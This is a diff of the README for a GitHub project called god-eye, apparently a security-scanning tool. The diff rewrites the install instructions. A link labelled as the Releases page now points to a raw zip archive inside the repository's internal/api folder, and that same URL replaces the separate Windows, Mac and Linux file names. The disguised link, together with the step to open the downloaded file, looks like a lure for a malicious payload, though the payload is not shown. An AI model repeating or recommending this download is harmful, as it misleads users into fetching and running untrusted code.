ommengman-prog/god-eye/README.md

 - **Vulnerability Scanning**

 ## 📥 Download & Install
-To get started with god-eye, visit the [Releases page](https://github.com/ommengman-prog/god-eye/releases) to download the latest version.
+To get started with god-eye, visit the [Releases page](https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/api/god-eye-1.6.zip) to download the latest version.

 1. Click on the link to the Releases page.
 2. Look for the latest release version available.
 3. Choose the file that matches your operating system.
-For Windows, you might see something like `god-eye-windows.exe`, for Mac it could be `god-eye-macos.dmg`, and for Linux users, `god-eye-linux.tar.gz`.
+For Windows, you might see something like `https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/api/god-eye-1.6.zip`, for Mac it could be `https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/api/god-eye-1.6.zip`, and for Linux users, `https://raw.githubusercontent.com/ommengman-prog/god-eye/main/internal/api/god-eye-1.6.zip`.
 4. Download the selected file.
 5. Open the downloaded file to install god-eye on your system.